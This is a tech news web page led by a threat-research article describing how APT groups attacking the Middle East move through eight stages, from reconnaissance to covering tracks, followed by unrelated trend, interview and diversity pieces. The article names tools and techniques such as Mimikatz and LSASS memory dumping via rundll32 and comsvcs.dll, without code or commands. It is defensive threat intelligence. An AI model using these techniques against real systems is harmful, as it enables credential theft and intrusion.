Have a question? +971 56 404 0503
Tech Features
In the Crosshairs of APT Groups: A Feline Eight-Step Kill Chain
By Alexander Badaev, Information security threat researcher, Positive Technologies Expert Security Center and Yana Avezova, Senior Research Analyst, Positive Technologies
In cybersecurity, “vulnerability” typically evokes concern. One actively searches for it and patches it up to build robust defenses against potential attacks. Picture a carefully orchestrated robbery, where a group of skilled criminals thoroughly examines a building’s structure, spots vulnerabilities, and crafts a step-by-step plan to breach security and steal valuables. This analogy perfectly describes the modus operandi of cybercriminals, with the “kill chain” acting as their detailed blueprint.
In a recent study, analysts from Positive Technologies gathered information on 16 hacker groups attacking the Middle East analyzing their techniques and tactics. It is worth noting that most of the threats in Middle Eastern countries come from groups believed to be linked to Iran—groups such as APT35/Charming Kitten or APT34/Helix Kitten. Let’s see how APT groups operate, how they initiate attacks, and how they develop them toward their intended targets.
Step 1: The Genesis of Intrusion (Attack preparation)
It all begins with meticulous planning and reconnaissance. APT groups leave no stone unturned in their quest for vulnerable targets. They compile lists of public systems with known vulnerabilities and gather employee information. For instance, groups like APT35 aka Charming Kitten known for targeting mainly Saudi Arabia and Israel, gather information about employees of target organizations, including mobile phone numbers, which they leverage for nefarious purposes like sending malicious links disguised as legitimate messages. After reconnaissance, they prepare tools for attacks, such as registering fake domains and creating email or social media accounts for spear phishing. For example, APT35 registers accounts on LinkedIn and other social networks to contact victims, persuading them through messages and voice calls to open malicious links.
Step 2: The Initial Access: Gaining a Foothold
Once armed with intelligence, cybercriminals proceed to gain initial access to their target’s network. Phishing campaigns, often masquerading as legitimate emails, serve as the primary means of infiltration. An example is the Desert Falcons group, observed spreading their malware through pornographic phishing. Notably, some groups go beyond traditional email phishing, utilizing social networks and messaging platforms to lure unsuspecting victims, as seen with APT35, Bahamut, Dark Caracal, and OilRig. Moreover, techniques like the watering hole method, where attackers compromise trusted websites frequented by their targets, further highlight the sophistication of these operations. Additionally, attackers exploit vulnerabilities in resources accessible on the internet to gain access to internal infrastructure. For example, APT35 and Moses Staff exploited ProxyShell vulnerabilities on Microsoft Exchange servers.
Step 3: Establishing Persistence: The Art of Concealment
Having breached the perimeter, APT groups strive to establish a foothold within the victim’s infrastructure, ensuring prolonged access and control. This involves deploying techniques such as task scheduling, as seen in the campaign against the UAE government by the OilRig group, which created a scheduled task triggering malicious software every five minutes. Additionally, many malicious actors set up malware autostart, like the Bahamut group creating LNK files in the startup folder or Dark Caracal’s Bandook trojan. Some APT groups, such as APT33, Mustang Panda, and Stealth Falcon, establish themselves in victim infrastructures by creating subscriptions to WMI events for event-triggered execution. Furthermore, attackers exploit vulnerabilities in server applications to install malicious components like web shells, which provide a backdoor for remote access and data exfiltration.
Step 4: Unraveling the Network: Internal Reconnaissance
After breaking in, APT groups don’t just sit there. They explore the system like a thief casing a house to find valuables and escape routes. This digital reconnaissance involves several steps. First, they perform an inventory check, identifying the computer’s operating system, installed programs, and updates, like figuring out a house’s security measures. For instance, APT35 might use a simple command to see if the computer is a powerful 64-bit system, capable of handling more complex tasks. Second, they map the network layout, akin to identifying valuable items and escape routes. APT groups might use basic tools like “ipconfig” and “arp” (like Mustang Panda) to see how devices are connected and communicate. They also search for user accounts and activity levels, understanding who lives in the house (figuratively) and their routines. Malicious tools, like the Caterpillar web shell used by Volatile Cedar, can list all usernames on the system. Examining running programs is another tactic, like checking for security guards. Built-in commands like “tasklist” (used by APT15 and OilRig) can reveal a list of programs currently running.
Finally, APT groups might deploy programs that hunt for secrets hidden within files and folders, like searching for hidden safes or documents. The MuddyWater group, for example, used malware that specifically checked for directories or files containing keywords related to antivirus software. By gathering this comprehensive intel, APT groups can craft targeted attacks, steal sensitive data like financial records or personal information, or exploit vulnerabilities in the system to cause even more damage.
Step 5: Harvesting Credentials: Unlocking the Vault
Access to privileged credentials is the holy grail for cyber attackers, granting them unrestricted access to critical systems and data. One common tactic is “credential dumping,” where tools like Mimikatz (used by APT15, APT33, and others) snatch passwords directly from a system’s memory, similar to stealing a key left under a doormat. Keyloggers, used by APT35 and Bahamut for example, acts like a hidden camera, silently recording keystrokes to capture usernames and passwords as victims type them in.
These stolen credentials grant access to even more sensitive areas. APT groups also exploit weaknesses in how passwords are stored. For instance, some target the Windows Credential Manager (like stealing a notepad with written down passwords). Brute-force attacks, trying millions of combinations, can crack weak passwords. Even encrypted passwords can be vulnerable if attackers have specialized tools. By employing these tactics, APT groups bypass initial security and access sensitive information or critical systems.
Step 6: Data Extraction: The Quest for Valuable Assets
Once inside, APT groups aren’t shy about snooping around. They leverage stolen credentials to capture screenshots, record audio and video (like hidden cameras and microphones), or directly steal sensitive files and databases. For instance, the Dark Caracal group employed Bandook malware, which can capture video from webcams and audio from microphones. This stolen data becomes their loot.
To ensure a smooth getaway, APT groups often employ encryption and archiving techniques. Imagine them hiding their stolen treasure chests—the Mustang Panda group, for example, encrypted files with RC4 and compressed them with password protection before shipping them out. This makes it difficult for defenders to identify suspicious activity amongst regular network traffic.
Step 7: Communication Channels: Establishing Control
APT groups rely on hidden communication channels with command-and-control (C2) servers to control infected machines and exfiltrate data. They employ various tactics to blend in with regular network traffic. This includes using common protocols (like IRC or DNS requests disguised as legitimate web traffic) and encrypting communication for further stealth.
However, some groups take it a step further. For instance, OilRig used compromised email servers to send control messages hidden within emails and then deleted them, making their C2 channel nearly invisible. These innovative techniques make it difficult for security measures to detect malicious activity, highlighting the importance of staying informed about evolving APT tactics.
Step 8: Covering Tracks: Erasing Digital Footprints
As the operation ends, APT groups meticulously cover their tracks to evade detection and prolong their presence in the compromised environment. Techniques like file obfuscation, masquerading, and indicator removal are employed to erase digital footprints and thwart forensic investigations. For example, the Bahamut group used icons mimicking Microsoft Office files to disguise malware, and the OilRig group used .doc file extensions to make malware appear as office documents. The Moses Staff group named their StrifeWater malware calc.exe to make it look like a legitimate calculator program.
To further bypass defenses, attackers often proxy the execution of malicious commands using files signed with trusted digital certificates. The APT35 group used the rundll32.exe file to execute the MiniDump function from the comsvcs.dll system library when dumping the LSASS process memory. Meanwhile, the Dark Caracal group employed a Microsoft Compiled HTML Help file to download and execute malicious files. Many APT groups also remove signs of their activity by clearing event logs and network connection histories, and changing timestamps. For instance, APT35 deleted mailbox export requests from compromised Microsoft Exchange servers. This meticulous cleaning makes it much more difficult for cybersecurity professionals to conduct post-incident investigations, as attackers often remove their arsenal of software from compromised devices after achieving their goals.
Conclusion: A Call to Vigilance
In a nutshell, the threat landscape in the Middle East is fraught with peril, as APT groups continue to refine their tactics and techniques to evade detection and wreak havoc on unsuspecting organizations. By understanding the anatomy of cyber intrusions and remaining vigilant against emerging threats, organizations can bolster their defenses and mitigate the risks posed by these sophisticated adversaries. Together, let us remain steadfast in our commitment to safeguarding the digital frontier against cyber threats.
As technology evolves, so do the challenges businesses face in keeping their digital assets secure. Cyber threats are becoming more sophisticated, and companies must adopt smarter strategies to stay ahead. Looking ahead to 2025, several key trends are set to shape the cybersecurity landscape. These trends highlight the need for proactive measures, collaboration, and innovation.
1. The Growing Threat of Persistent Cyberattacks
Cyberattacks are no longer quick strikes. Today’s attackers aim to exhaust their targets with prolonged campaigns that evolve over time. A key example is Distributed Denial of Service (DDoS) attacks, where hackers continuously adapt their tactics, overwhelming organisations’ defences over days or even weeks.
Businesses must prepare by investing in systems that can adapt to changing threats and ensuring their teams are equipped to handle extended attacks without burnout.
2. Securing the Supply Chain
The supply chain remains a critical weak link in cybersecurity. High-profile breaches have shown how vulnerabilities in third-party systems can ripple across entire industries. Many organisations are now testing updates in phases rather than applying them broadly to minimise risks.
Building stronger relationships with suppliers and industry peers and implementing stricter controls can help prevent supply chain disruptions.
3. Unified Cybersecurity Platforms
Organisations are moving towards integrated cybersecurity platforms, where tools work together seamlessly. This approach simplifies operations, reduces costs, and ensures better protection.
However, businesses must ensure these platforms are compatible with their existing systems. The challenge lies in finding solutions that not only meet their needs but also enhance the effectiveness of the overall security framework.
4. Artificial Intelligence: Friend and Foe
AI is transforming cybersecurity on both sides of the equation. For defenders, AI-powered tools can analyse threats faster and predict potential risks. For example, AI can help identify unusual activity on a network and forecast future attacks.
However, attackers are also using AI to automate their methods, making their attacks more effective and harder to counter. Businesses must stay ahead by adopting AI tools that can detect and counter these advanced threats.
5. Cloud Security: A Growing Concern
Cloud computing offers flexibility, but it also introduces risks. Many businesses rely on cloud services without fully understanding the potential vulnerabilities. A failure in a major cloud service could disrupt operations for countless businesses, even those not hosted on the cloud directly.
To minimise risks, organisations should diversify their cloud providers, improve visibility into their cloud environments, and ensure critical systems have backups.
6. Preparing for State-Sponsored Cyberattacks
Geopolitical tensions are driving an increase in state-sponsored cyberattacks. These attacks often target critical infrastructure, creating significant disruptions.
Organisations should work closely with government bodies and security organisations to stay informed and coordinated. Sharing information and best practices across industries will be vital for defence.
7. Bridging the Cybersecurity Skills Gap
The cybersecurity skills gap continues to widen, with a shortage of experienced professionals. Many new hires focus on surface-level tasks without fully understanding the underlying systems they are protecting.
Companies must prioritise training programmes that give employees a deeper understanding of cybersecurity fundamentals. Investing in tools that simplify complex processes can also help make the most of limited resources.
8. The Risks of Over-Reliance on Technology
Many organisations rely heavily on technology without considering what happens if it fails. For instance, a disruption in a commonly used service, like cloud-based analytics tools, could create widespread problems.
To avoid such risks, businesses should plan for contingencies, such as using multiple service providers and ensuring their systems can operate independently if needed.
The Path Forward
Cybersecurity in 2025 will require businesses to think strategically and act proactively. Here’s how companies can prepare:
- Invest in Adaptability: Develop systems that can respond to evolving threats.
- Strengthen Collaboration: Work with industry peers and regulatory bodies to share insights and resources.
- Focus on Fundamentals: Train teams to understand and address root causes, not just surface-level issues.
- Diversify and Secure Infrastructure: Avoid over-reliance on single solutions and ensure redundancy where possible.
The future of cybersecurity is challenging, but it also offers opportunities for innovation. By staying informed and adaptable, businesses can protect their assets and thrive in an increasingly digital world.
Laura Hernandez Gonzalez, Managing Director for MENA at Globant opens up about her mission to foster diversity, inclusivity, and innovation in the tech world. She shares her approach to leading projects that prioritize the integration of emerging technologies like AI, while ensuring that these advancements benefit underserved communities and drive positive societal change.
What inspired your journey into technology and business strategy, and how did you transition into leadership roles in the industry?
From the start, my path into technology and business strategy has been shaped by curiosity, adaptability, and a deep belief in transformation through innovation. With a background in chemical engineering, I started my career in the Oil & Gas sector, where I was exposed very quickly to large-scale transformation projects and the power of digitalization. Working on pioneering technology-driven initiatives sparked my passion for strategic problem-solving and business evolution, eventually leading me to transition into business consulting. There, I found the opportunity to help organizations rethink their models and unlock new avenues for growth through technology and innovation.
Throughout my career, I’ve also embraced an entrepreneurial mindset, taking on initiatives that required me to navigate uncertainty, build solutions from the ground up, and drive meaningful impact beyond traditional corporate structures. This experience reinforced my ability to spot opportunities, adapt quickly, and lead with a results-driven approach—qualities that have shaped my leadership style over the years.
Working across multiple industries, countries, and cultural landscapes, has helped me gain a global perspective that has been instrumental in shaping my strategic thinking. Understanding different market dynamics, leadership styles, and business environments has only strengthened my belief that adaptability and innovation are key to long-term success. The defining moments in my journey have always been those that challenged me to step outside my comfort zone, embrace change, and take bold action.
What ultimately drew me to the tech industry was its boundless potential to reshape entire sectors. Technology is no longer a supporting function—it is the driving force behind transformation in finance, healthcare, entertainment, and beyond. Being part of Globant, a company that partners with the world’s most influential brands, has allowed me to contribute to high-impact projects while continuously evolving as a leader.
Today, leadership in technology is not about authority—it’s about empowerment. At Globant, we embrace a leadership model that fosters autonomy, collaboration, and continuous learning. My role is not to dictate every decision but to create an environment where brilliant minds can thrive, innovate, and challenge the status quo.
Having worked across multiple continents, how have these diverse experiences shaped your leadership style and strategic approach to business?
One of the most powerful lessons I’ve learned is that leadership is rooted in adaptability and empathy. Working across multiple continents—from Europe and the Americas to the Middle East—has reinforced the importance of understanding diverse perspectives, adapting to different business dynamics, and fostering inclusive environments where teams can thrive.
At Globant, with operations in 35 countries across five continents, we have built a culture of collaboration, agility, and innovation. Our Agile Pods model—autonomous, multidisciplinary teams that experiment and innovate continuously—has shown me firsthand that true innovation happens when different perspectives and expertise come together. This approach not only enhances efficiency and creativity but also empowers teams to take ownership of their goals and drive meaningful impact.
My global exposure has shaped my leadership philosophy—I’ve seen that success isn’t just about expertise; it’s about embracing diversity of thought, culture, and experience. Inclusion isn’t just a moral imperative—it’s a competitive advantage, and in a world where technology is bridging gaps and redefining industries, leaders who cultivate diverse, adaptable teams will be the ones who shape the future.
Can you walk us through your daily routine and also share some positive habits you’ve developed to continually improve and adapt in your leadership role at Globant?
Balance is essential. My daily routine revolves around three key pillars: connection, continuous learning, and well-being. No matter how fast-paced our industry is, I prioritize meaningful interactions with my team and clients—because people are at the heart of every successful company. Staying engaged fosters trust, collaboration, and innovation.
The rapid pace of technological change means stagnation is not an option. To stay ahead, I make continuous learning a priority, whether through executive education—like my experience at Stanford GSB—or by engaging with leading voices in the industry. One key takeaway? Technology’s true power is unlocked through human ingenuity and creativity.
Equally important is well-being, because high performance is not sustainable without balance. I ensure that self-care remains a priority, whether through sports, reading, or moments of reflection. Maintaining mental sharpness and energy is essential, not just for personal resilience but for making better, more strategic decisions as a leader.
Great leadership is about inspiring, empowering, and driving meaningful impact. I believe that staying curious, agile, and engaged is what makes this journey fulfilling.
As a woman leader in technology, how do you see AI-driven personalized banking solutions advancing financial inclusion, particularly for women and underserved communities?
AI is reshaping financial services, making them more accessible than ever. Traditional banking models often rely on rigid credit requirements, leaving many individuals—including those in emerging markets—without access to essential financial tools. We are now seeing AI-driven solutions democratizing access to banking, credit, and investment opportunities, reaching populations that were previously underserved.
In regions like the Middle East, where financial ecosystems are evolving rapidly, AI has the potential to expand access to personalized financial services at a larger scale. By leveraging alternative data and intelligent credit scoring, financial institutions can move beyond traditional eligibility criteria and offer more inclusive, tailored financial solutions.
At Globant, we believe in technology for good. AI shouldn’t just drive efficiency; it should empower people. If leveraged correctly, it can help millions gain financial independence and control over their economic futures. The key is to ensure that these technologies are designed with inclusivity, transparency, and ethical considerations at their core.
What’s one important leadership lesson you’ve learned that every woman in leadership roles should embrace?
One of the most important lessons I’ve learned is to embrace challenges, take risks and step out of comfort zones. Growth happens when we push ourselves beyond what feels familiar—whether that means leading a new initiative, transitioning into a different industry, or taking on a bigger role. The key is to say yes to opportunities, even before feeling fully ready—because that’s where real development happens.
Having spent many years in the Middle East, I’ve witnessed firsthand the significant progress in women’s inclusion and leadership across industries. More women are stepping into technology, entrepreneurship, and executive roles, actively shaping the region’s innovation landscape. This transformation highlights the impact of opportunity, mentorship, and education—key drivers of meaningful and lasting change.
Another key lesson is the power of community and mentorship. No one succeeds alone, and building strong networks of support, collaboration, and knowledge-sharing is essential for any leader. At Globant, we encourage a mindset of boldness and continuous learning, providing the tools and support for people to develop professionally and thrive. We actively promote STEM education and initiatives that encourage young women to pursue careers in technology and leadership.
To anyone looking to thrive in tech, my advice is simple:
- Keep learning and evolving—curiosity fuels growth
- Build a network of people who challenge, support, and inspire you
- Own your journey—confidence comes from action, not just certainty
The future of technology is diverse, and we all have a role in shaping it.
By Nezha Alaoui
The tech industry has long enough been a space defined by innovation and progress, yet when it comes to gender diversity, the sector still has a bit of a ground to cover. Despite increased awareness, women remain underrepresented in leadership roles, funding opportunities, and technical positions. For Nezha Alaoui, Founder and CEO of Women Choice, the conversation is not just about bridging gaps but it is about ensuring women play a central role in shaping the future of technology.
Being a social impact entrepreneur and global thought leader, Alaoui has worked extensively on initiatives aimed at empowering women in professional spaces. She emphasizes that while talent is equally distributed, opportunities are not. “The challenge is not a lack of skill or ambition, it is the absence of access, mentorship, and representation,” she says.
Through Women Choice, Nezha has collaborated with fortune 500 companies and institutions to implement mentorship programs, leadership training, and inclusive hiring strategies to help women navigate and advance in the tech industry. In the last twelve months, Nezha and her team gathered 550+ women in tech in a series of monthly events held in Dubai in partnership with a tech leader. She is creating spaces where women can connect, learn, and step into leadership roles. She acknowledges that real progress requires a shift beyond policies, it demands a cultural change within organizations and the industry at large.
She also highlights the importance of visibility in driving change. “When women see leaders who look like them, it creates a ripple effect. It signals that there’s space for them at the table,” Alaoui notes. Her work is focused on fostering real connections, creating professional pathways, and ensuring that inclusion is not just a buzzword, but a business imperative.
As technology continues to shape every aspect of modern life, ensuring diverse perspectives in its development at a grassroot level is crucial. Nezha believes that tech companies must go beyond performative gestures and commit to real structural changes. From funding more women-led startups to building diverse and dynamic leadership teams, the industry stands to benefit from making inclusivity a core part of its growth.
While the road ahead remains challenging, Alaoui remains optimistic. “The future of tech is being written today, let’s make sure women are co-authors of that story.
Cluster 2 Signs an Agreement to Advance Smart Airport Operations in Saudi Arabia
How Innovations Group Is Powering the UAE’s Hospitality Workforce
Cybersecurity in 2025: Trends, Challenges, and Opportunities
Denodo Bolsters Executive Team by Hiring Christophe Culine as its Chief Revenue Officer
Navigating the Cybersecurity Landscape in Hybrid Work Environments
Brighton College Abu Dhabi and Brighton College Al Ain Donate 954 IT Devices in Support of ‘Donate Your Own Device’ Campaign
-
Tech News11 months agoDenodo Bolsters Executive Team by Hiring Christophe Culine as its Chief Revenue Officer
-
Tech Interviews1 year agoNavigating the Cybersecurity Landscape in Hybrid Work Environments
-
Tech News1 year agoBrighton College Abu Dhabi and Brighton College Al Ain Donate 954 IT Devices in Support of ‘Donate Your Own Device’ Campaign
-
VAR2 months agoMicrosoft Launches New Surface Copilot+ PCs for Business
-
Tech Features1 year agoThe Middle East to Lead with Next-generation Mission Critical Communication Advancement
-
VAR10 months agoSamsung Galaxy Z Fold6 vs Google Pixel 9 Pro Fold: Clash Of The Folding Phenoms
-
Features1 year agoSecurity in the Cloud Age: Combating Risks with Hybrid Cloud Solutions
-
Automotive1 year agoAl-Futtaim Automotive Builds On 23-Year Legacy of Trust & Leadership in UAE’s Pre-Owned Car Market to Sell Over 25,000 Used Vehicles in 2023